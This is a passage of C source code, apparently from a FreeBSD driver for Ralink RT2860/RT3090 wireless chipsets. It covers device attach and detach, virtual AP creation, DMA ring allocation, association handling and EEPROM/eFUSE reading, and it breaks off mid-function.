*, struct rt2860_tx_ring *); static void rt2860_free_tx_ring(struct rt2860_softc *, struct rt2860_tx_ring *); static int rt2860_alloc_tx_pool(struct rt2860_softc *); static void rt2860_free_tx_pool(struct rt2860_softc *); static int rt2860_alloc_rx_ring(struct rt2860_softc *, struct rt2860_rx_ring *); static void rt2860_reset_rx_ring(struct rt2860_softc *, struct rt2860_rx_ring *); static void rt2860_free_rx_ring(struct rt2860_softc *, struct rt2860_rx_ring *); static void rt2860_updatestats(struct rt2860_softc *); static void rt2860_newassoc(struct ieee80211_node *, int); static void rt2860_node_free(struct ieee80211_node *); #ifdef IEEE80211_HT static int rt2860_ampdu_rx_start(struct ieee80211com *, struct ieee80211_node *, uint8_t); static void rt2860_ampdu_rx_stop(struct ieee80211com *, struct ieee80211_node *, uint8_t); #endif static int rt2860_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t rt3090_efuse_read_2(struct rt2860_softc *, uint16_t); static uint16_t rt2860_eeprom_read_2(struct rt2860_softc *, uint16_t); static void rt2860_intr_coherent(struct rt2860_softc *); static void rt2860_drain_stats_fifo(struct rt2860_softc *); static void rt2860_tx_intr(struct rt2860_softc *, int); static void rt2860_rx_intr(struct rt2860_softc *); static void rt2860_tbtt_intr(struct rt2860_softc *); static void rt2860_gp_intr(struct rt2860_softc *); static int rt2860_tx(struct rt2860_softc *, struct mbuf *, struct ieee80211_node *); static int rt2860_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int rt2860_tx_raw(struct rt2860_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *params); static void rt2860_start(struct ifnet *); static void rt2860_start_locked(struct ifnet *); static void rt2860_watchdog(void *); static int rt2860_ioctl(struct ifnet *, u_long, caddr_t); static void rt2860_mcu_bbp_write(struct rt2860_softc *, uint8_t, uint8_t); static uint8_t rt2860_mcu_bbp_read(struct rt2860_softc *, uint8_t); static void rt2860_rf_write(struct rt2860_softc *, uint8_t, uint32_t); static uint8_t rt3090_rf_read(struct rt2860_softc *, uint8_t); static void rt3090_rf_write(struct rt2860_softc *, uint8_t, uint8_t); static int rt2860_mcu_cmd(struct rt2860_softc *, uint8_t, uint16_t, int); static void rt2860_enable_mrr(struct rt2860_softc *); static void rt2860_set_txpreamble(struct rt2860_softc *); static void rt2860_set_basicrates(struct rt2860_softc *, const struct ieee80211_rateset *); static void rt2860_scan_start(struct ieee80211com *); static void rt2860_scan_end(struct ieee80211com *); static void rt2860_set_channel(struct ieee80211com *); static void rt2860_select_chan_group(struct rt2860_softc *, int); static void rt2860_set_chan(struct rt2860_softc *, u_int); static void rt3090_set_chan(struct rt2860_softc *, u_int); static int rt3090_rf_init(struct rt2860_softc *); static void rt3090_rf_wakeup(struct rt2860_softc *); static int rt3090_filter_calib(struct rt2860_softc *, uint8_t, uint8_t, uint8_t *); static void rt3090_rf_setup(struct rt2860_softc *); static void rt2860_set_leds(struct rt2860_softc *, uint16_t); static void rt2860_set_gp_timer(struct rt2860_softc *, int); static void rt2860_set_bssid(struct rt2860_softc *, const uint8_t *); static void rt2860_set_macaddr(struct rt2860_softc *, const uint8_t *); static void rt2860_update_promisc(struct ifnet *); static void rt2860_updateslot(struct ifnet *); static void rt2860_updateprot(struct ifnet *); static int rt2860_updateedca(struct ieee80211com *); #ifdef HW_CRYPTO static int rt2860_set_key(struct ieee80211com *, struct ieee80211_node *, struct ieee80211_key *); static void rt2860_delete_key(struct ieee80211com *, struct ieee80211_node *, struct ieee80211_key *); #endif static int8_t rt2860_rssi2dbm(struct rt2860_softc *, uint8_t, uint8_t); static const char *rt2860_get_rf(uint8_t); static int rt2860_read_eeprom(struct rt2860_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static int rt2860_bbp_init(struct rt2860_softc *); static int rt2860_txrx_enable(struct rt2860_softc *); static void rt2860_init(void *); static void rt2860_init_locked(struct rt2860_softc *); static void rt2860_stop(void *); static void rt2860_stop_locked(struct rt2860_softc *); static int rt2860_load_microcode(struct rt2860_softc *); #ifdef NOT_YET static void rt2860_calib(struct rt2860_softc *); #endif static void rt3090_set_rx_antenna(struct rt2860_softc *, int); static void rt2860_switch_chan(struct rt2860_softc *, struct ieee80211_channel *); static int rt2860_setup_beacon(struct rt2860_softc *, struct ieee80211vap *); static void rt2860_enable_tsf_sync(struct rt2860_softc *); static const struct { uint32_t reg; uint32_t val; } rt2860_def_mac[] = { RT2860_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2860_def_bbp[] = { RT2860_DEF_BBP }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rt2860_rf2850[] = { RT2860_RF2850 }; struct { uint8_t n, r, k; } rt3090_freqs[] = { RT3070_RF3052 }; static const struct { uint8_t reg; uint8_t val; } rt3090_def_rf[] = { RT3070_DEF_RF }; int rt2860_attach(device_t dev, int id) { struct rt2860_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; uint32_t tmp; int error, ntries, qid; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; sc->sc_debug = 0; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); return ENOMEM; } ic = ifp->if_l2com; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); /* wait for NIC to initialize */ for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT2860_ASIC_VER_ID); if (tmp != 0 && tmp != 0xffffffff) break; DELAY(10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for NIC to initialize\n"); error = EIO; goto fail1; } sc->mac_ver = tmp >> 16; sc->mac_rev = tmp & 0xffff; if (sc->mac_ver != 0x2860 && (id == 0x0681 || id == 0x0781 || id == 0x1059)) sc->sc_flags |= RT2860_ADVANCED_PS; /* retrieve RF rev. no and various other things from EEPROM */ rt2860_read_eeprom(sc, macaddr); if (bootverbose) { device_printf(sc->sc_dev, "MAC/BBP RT%X (rev 0x%04X), " "RF %s (MIMO %dT%dR), address %6D\n", sc->mac_ver, sc->mac_rev, rt2860_get_rf(sc->rf_rev), sc->ntxchains, sc->nrxchains, macaddr, ":"); } /* * Allocate Tx (4 EDCAs + HCCA + Mgt) and Rx rings. */ for (qid = 0; qid < 6; qid++) { if ((error = rt2860_alloc_tx_ring(sc, &sc->txq[qid])) != 0) { device_printf(sc->sc_dev, "could not allocate Tx ring %d\n", qid); goto fail2; } } if ((error = rt2860_alloc_rx_ring(sc, &sc->rxq)) != 0) { device_printf(sc->sc_dev, "could not allocate Rx ring\n"); goto fail2; } if ((error = rt2860_alloc_tx_pool(sc)) != 0) { device_printf(sc->sc_dev, "could not allocate Tx pool\n"); goto fail3; } /* mgmt ring is broken on RT2860C, use EDCA AC VO ring instead */ sc->mgtqid = (sc->mac_ver == 0x2860 && sc->mac_rev == 0x0100) ? WME_AC_VO : 5; ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rt2860_init; ifp->if_ioctl = rt2860_ioctl; ifp->if_start = rt2860_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_WDS /* 4-address traffic works */ | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ #if 0 | IEEE80211_C_BGSCAN /* capable of bg scanning */ #endif | IEEE80211_C_WME /* 802.11e */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2860_RF_2750 || sc->rf_rev == RT2860_RF_2850) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); ic->ic_wme.wme_update = rt2860_updateedca; ic->ic_scan_start = rt2860_scan_start; ic->ic_scan_end = rt2860_scan_end; ic->ic_set_channel = rt2860_set_channel; ic->ic_updateslot = rt2860_updateslot; ic->ic_update_promisc = rt2860_update_promisc; ic->ic_raw_xmit = rt2860_raw_xmit; sc->sc_node_free = ic->ic_node_free; ic->ic_node_free = rt2860_node_free; ic->ic_newassoc = rt2860_newassoc; ic->ic_vap_create = rt2860_vap_create; ic->ic_vap_delete = rt2860_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2860_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2860_RX_RADIOTAP_PRESENT); #ifdef RAL_DEBUG SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "debug msgs"); #endif if (bootverbose) ieee80211_announce(ic); return 0; fail3: rt2860_free_rx_ring(sc, &sc->rxq); fail2: while (--qid >= 0) rt2860_free_tx_ring(sc, &sc->txq[qid]); fail1: mtx_destroy(&sc->sc_mtx); if_free(ifp); return error; } int rt2860_detach(void *xsc) { struct rt2860_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int qid; RAL_LOCK(sc); rt2860_stop_locked(sc); RAL_UNLOCK(sc); ieee80211_ifdetach(ic); for (qid = 0; qid < 6; qid++) rt2860_free_tx_ring(sc, &sc->txq[qid]); rt2860_free_rx_ring(sc, &sc->rxq); rt2860_free_tx_pool(sc); if_free(ifp); mtx_destroy(&sc->sc_mtx); return 0; } void rt2860_shutdown(void *xsc) { struct rt2860_softc *sc = xsc; rt2860_stop(sc); } void rt2860_suspend(void *xsc) { struct rt2860_softc *sc = xsc; rt2860_stop(sc); } void rt2860_resume(void *xsc) { struct rt2860_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) rt2860_init(sc); } static struct ieee80211vap * rt2860_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_vap *rvp; struct ieee80211vap *vap; switch (opmode) { case IEEE80211_M_STA: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* XXXRP: TBD */ if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "only 1 vap supported\n"); return NULL; } if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: if (TAILQ_EMPTY(&ic->ic_vaps) || ic->ic_opmode != IEEE80211_M_HOSTAP) { if_printf(ifp, "wds only supported in ap mode\n"); return NULL; } /* * Silently remove any request for a unique * bssid; WDS vap's always share the local * mac address. */ flags &= ~IEEE80211_CLONE_BSSID; break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return NULL; } rvp = malloc(sizeof(struct rt2860_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->ral_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ rvp->ral_newstate = vap->iv_newstate; vap->iv_newstate = rt2860_newstate; #if 0 vap->iv_update_beacon = rt2860_beacon_update; #endif /* HW supports up to 255 STAs (0-254) in HostAP and IBSS modes */ vap->iv_max_aid = min(IEEE80211_AID_MAX, RT2860_WCID_MAX); ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); if (TAILQ_FIRST(&ic->ic_vaps) == vap) ic->ic_opmode = opmode; return vap; } static void rt2860_vap_delete(struct ieee80211vap *vap) { struct rt2860_vap *rvp = RT2860_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } static void rt2860_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int rt2860_alloc_tx_ring(struct rt2860_softc *sc, struct rt2860_tx_ring *ring) { int size, error; size = RT2860_TX_RING_COUNT * sizeof (struct rt2860_txd); error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 16, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA map\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->txd, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->txd, size, rt2860_dma_map_addr, &ring->paddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2860_free_tx_ring(sc, ring); return error; } void rt2860_reset_tx_ring(struct rt2860_softc *sc, struct rt2860_tx_ring *ring) { struct rt2860_tx_data *data; int i; for (i = 0; i < RT2860_TX_RING_COUNT; i++) { if ((data = ring->data[i]) == NULL) continue; /* nothing mapped in this slot */ if (data->m != NULL) { bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } SLIST_INSERT_HEAD(&sc->data_pool, data, next); ring->data[i] = NULL; } ring->queued = 0; ring->cur = ring->next = 0; } void rt2860_free_tx_ring(struct rt2860_softc *sc, struct rt2860_tx_ring *ring) { struct rt2860_tx_data *data; int i; if (ring->txd != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->txd, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); for (i = 0; i < RT2860_TX_RING_COUNT; i++) { if ((data = ring->data[i]) == NULL) continue; /* nothing mapped in this slot */ if (data->m != NULL) { bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); SLIST_INSERT_HEAD(&sc->data_pool, data, next); } } /* * Allocate a pool of TX Wireless Information blocks. */ int rt2860_alloc_tx_pool(struct rt2860_softc *sc) { caddr_t vaddr; bus_addr_t paddr; int i, size, error; size = RT2860_TX_POOL_COUNT * RT2860_TXWI_DMASZ; /* init data_pool early in case of failure.. */ SLIST_INIT(&sc->data_pool); error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &sc->txwi_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create txwi DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->txwi_dmat, (void **)&sc->txwi_vaddr, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->txwi_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->txwi_dmat, sc->txwi_map, sc->txwi_vaddr, size, rt2860_dma_map_addr, &paddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load txwi DMA map\n"); goto fail; } bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_PREWRITE); vaddr = sc->txwi_vaddr; for (i = 0; i < RT2860_TX_POOL_COUNT; i++) { struct rt2860_tx_data *data = &sc->data[i]; error = bus_dmamap_create(sc->txwi_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->txwi = (struct rt2860_txwi *)vaddr; data->paddr = paddr; vaddr += RT2860_TXWI_DMASZ; paddr += RT2860_TXWI_DMASZ; SLIST_INSERT_HEAD(&sc->data_pool, data, next); } return 0; fail: rt2860_free_tx_pool(sc); return error; } void rt2860_free_tx_pool(struct rt2860_softc *sc) { if (sc->txwi_vaddr != NULL) { bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, sc->txwi_map); bus_dmamem_free(sc->txwi_dmat, sc->txwi_vaddr, sc->txwi_map); } if (sc->txwi_dmat != NULL) bus_dma_tag_destroy(sc->txwi_dmat); while (!SLIST_EMPTY(&sc->data_pool)) { struct rt2860_tx_data *data; data = SLIST_FIRST(&sc->data_pool); bus_dmamap_destroy(sc->txwi_dmat, data->map); SLIST_REMOVE_HEAD(&sc->data_pool, next); } } int rt2860_alloc_rx_ring(struct rt2860_softc *sc, struct rt2860_rx_ring *ring) { bus_addr_t physaddr; int i, size, error; size = RT2860_RX_RING_COUNT * sizeof (struct rt2860_rxd); error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 16, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->rxd, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->rxd, size, rt2860_dma_map_addr, &ring->paddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < RT2860_RX_RING_COUNT; i++) { struct rt2860_rx_data *data = &ring->data[i]; struct rt2860_rxd *rxd = &ring->rxd[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2860_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } rxd->sdp0 = htole32(physaddr); rxd->sdl0 = htole16(MCLBYTES); } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2860_free_rx_ring(sc, ring); return error; } void rt2860_reset_rx_ring(struct rt2860_softc *sc, struct rt2860_rx_ring *ring) { int i; for (i = 0; i < RT2860_RX_RING_COUNT; i++) ring->rxd[i].sdl0 &= ~htole16(RT2860_RX_DDONE); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->cur = 0; } void rt2860_free_rx_ring(struct rt2860_softc *sc, struct rt2860_rx_ring *ring) { int i; if (ring->rxd != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->rxd, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); for (i = 0; i < RT2860_RX_RING_COUNT; i++) { struct rt2860_rx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static void rt2860_updatestats(struct rt2860_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; /* * In IBSS or HostAP modes (when the hardware sends beacons), the * MAC can run into a livelock and start sending CTS-to-self frames * like crazy if protection is enabled. Fortunately, we can detect * when such a situation occurs and reset the MAC. */ if (ic->ic_curmode != IEEE80211_M_STA) { /* check if we're in a livelock situation.. */ uint32_t tmp = RAL_READ(sc, RT2860_DEBUG); if ((tmp & (1 << 29)) && (tmp & (1 << 7 | 1 << 5))) { /* ..and reset MAC/BBP for a while.. */ DPRINTF(("CTS-to-self livelock detected\n")); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_SRST); RAL_BARRIER_WRITE(sc); DELAY(1); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); } } } static void rt2860_newassoc(struct ieee80211_node *ni, int isnew) { struct ieee80211com *ic = ni->ni_ic; struct rt2860_softc *sc = ic->ic_ifp->if_softc; uint8_t wcid; wcid = IEEE80211_AID(ni->ni_associd); if (isnew && ni->ni_associd != 0) { sc->wcid2ni[wcid] = ni; /* init WCID table entry */ RAL_WRITE_REGION_1(sc, RT2860_WCID_ENTRY(wcid), ni->ni_macaddr, IEEE80211_ADDR_LEN); } DPRINTF(("new assoc isnew=%d addr=%s WCID=%d\n", isnew, ether_sprintf(ni->ni_macaddr), wcid)); } static void rt2860_node_free(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct rt2860_softc *sc = ic->ic_ifp->if_softc; uint8_t wcid; if (ni->ni_associd != 0) { wcid = IEEE80211_AID(ni->ni_associd); /* clear Rx WCID search table entry */ RAL_SET_REGION_4(sc, RT2860_WCID_ENTRY(wcid), 0, 2); } sc->sc_node_free(ni); } #ifdef IEEE80211_HT static int rt2860_ampdu_rx_start(struct ieee80211com *ic, struct ieee80211_node *ni, uint8_t tid) { struct rt2860_softc *sc = ic->ic_softc; uint8_t wcid = ((struct rt2860_node *)ni)->wcid; uint32_t tmp; /* update BA session mask */ tmp = RAL_READ(sc, RT2860_WCID_ENTRY(wcid) + 4); tmp |= (1 << tid) << 16; RAL_WRITE(sc, RT2860_WCID_ENTRY(wcid) + 4, tmp); return 0; } static void rt2860_ampdu_rx_stop(struct ieee80211com *ic, struct ieee80211_node *ni, uint8_t tid) { struct rt2860_softc *sc = ic->ic_softc; uint8_t wcid = ((struct rt2860_node *)ni)->wcid; uint32_t tmp; /* update BA session mask */ tmp = RAL_READ(sc, RT2860_WCID_ENTRY(wcid) + 4); tmp &= ~((1 << tid) << 16); RAL_WRITE(sc, RT2860_WCID_ENTRY(wcid) + 4, tmp); } #endif int rt2860_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rt2860_vap *rvp = RT2860_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rt2860_softc *sc = ic->ic_ifp->if_softc; uint32_t tmp; int error; if (vap->iv_state == IEEE80211_S_RUN) { /* turn link LED off */ rt2860_set_leds(sc, RT2860_LED_RADIO); } if (nstate == IEEE80211_S_INIT && vap->iv_state == IEEE80211_S_RUN) { /* abort TSF synchronization */ tmp = RAL_READ(sc, RT2860_BCN_TIME_CFG); RAL_WRITE(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); } rt2860_set_gp_timer(sc, 0); error = rvp->ral_newstate(vap, nstate, arg); if (error != 0) return (error); if (nstate == IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; if (ic->ic_opmode != IEEE80211_M_MONITOR) { rt2860_enable_mrr(sc); rt2860_set_txpreamble(sc); rt2860_set_basicrates(sc, &ni->ni_rates); rt2860_set_bssid(sc, ni->ni_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { error = rt2860_setup_beacon(sc, vap); if (error != 0) return error; } if (ic->ic_opmode != IEEE80211_M_MONITOR) { rt2860_enable_tsf_sync(sc); rt2860_set_gp_timer(sc, 500); } /* turn link LED on */ rt2860_set_leds(sc, RT2860_LED_RADIO | (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan) ? RT2860_LED_LINK_2GHZ : RT2860_LED_LINK_5GHZ)); } return error; } /* Read 16-bit from eFUSE ROM (>=RT3071 only.) */ static uint16_t rt3090_efuse_read_2(struct rt2860_softc *sc, uint16_t addr) { uint32_t tmp; uint16_t reg; int ntries; addr *= 2; /*- * Read one 16-byte block into registers EFUSE_DATA[0-3]: * DATA0: F E D C * DATA1: B A 9 8 * DATA2: 7 6 5 4 * DATA3: 3 2 1 0 */ tmp = RAL_READ(sc, RT3070_EFUSE_CTRL); tmp &= ~(RT3070_EFSROM_MODE_MASK | RT3070_EFSROM_AIN_MASK); tmp |= (addr & ~0xf) << RT3070_EFSROM_AIN_SHIFT | RT3070_EFSROM_KICK; RAL_WRITE(sc, RT3070_EFUSE_CTRL, tmp); for (ntries = 0; ntries < 500; ntries++) { tmp = RAL_READ(sc, RT3070_EFUSE_CTRL); if (!(tmp & RT3070_EFSROM_KICK)) break; DELAY(2); } if (ntries == 500) return 0xffff; if ((tmp & RT3070_EFUSE_AOUT_MASK) == RT3070_EFUSE_AOUT_MASK) return 0xffff; /* address not found */ /* determine to which 32-bit register our 16-bit word belongs */ reg = RT3070_EFUSE_DATA3 - (addr & 0xc); tmp = RAL_READ(sc, reg); return (addr & 2) ? tmp >> 16 : tmp & 0xffff; } /* * Read 16 bits at address 'addr' from the serial EEPROM (either 93C46, * 93C66 or 93C86). */ static uint16_t rt2860_eeprom_read_2(struct rt2860_softc *sc, uint16_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ RT2860_EEPROM_CTL(sc, 0); RT2860_EEPROM_CTL(sc, RT2860_S); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_C); RT2860_EEPROM_CTL(sc, RT2860_S); /* write start bit (1) */ RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D | RT2860_C); /* write READ opcode (10) */ RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_D | RT2860_C); RT2860_EEPROM_CTL(sc, RT2860_S); RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_C); /* write address (A5-A0 or A7-A0) */ n = ((RAL_READ(sc, RT2860_PCI_EECTRL) & 0x30) == 0) ? 5 : 7; for (; n >= 0; n--) { RT2860_EEPROM_CTL(sc, RT2860_S | (((addr >> n) & 1) << RT2860_SHIFT_D)); RT2860_EEPROM_CTL(sc, RT2860_S | (((addr >> n) & 1) << RT2860_SHIFT_D) | RT2860_C); } RT2860_EEPROM_CTL(sc, RT2860_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { RT2860_EEPROM_CTL(sc, RT2860_S | RT2860_C); tmp = RAL_READ(sc, RT2860_PCI_EECTRL); val |= ((tmp & RT2860_Q) >> RT2860_SHIFT_Q) << n; RT2860_EEPROM_CTL(sc, RT2860_S); } RT2860_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ RT2860_EEPROM_CTL(sc, RT2860_S); RT2860_EEPROM_CTL(sc, 0); RT2860_EEPROM_CTL(sc, RT2860_C); return val; } static __inline uint16_t rt2860_srom_read(struct rt2860_softc *sc, uint8_t addr) { /* either eFUSE ROM or EEPROM */ return sc->sc_srom_read(sc, addr); } static void rt2860_intr_coherent(struct rt2860_softc *sc) { uint32_t tmp; /* DMA finds data coherent event when checking the DDONE bit */ DPRINTF(("Tx/Rx Coherent interrupt\n")); /* restart DMA engine */ tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); tmp &= ~(RT2860_TX_WB_DDONE | RT2860_RX_DMA_EN | RT2860_TX_DMA_EN); RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); (void)rt2860_txrx_enable(sc); } static void rt2860_drain_stats_fifo(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211_node *ni; uint32_t stat; int retrycnt; uint8_t wcid, mcs, pid; /* drain Tx status FIFO (maxsize = 16) */ while ((stat 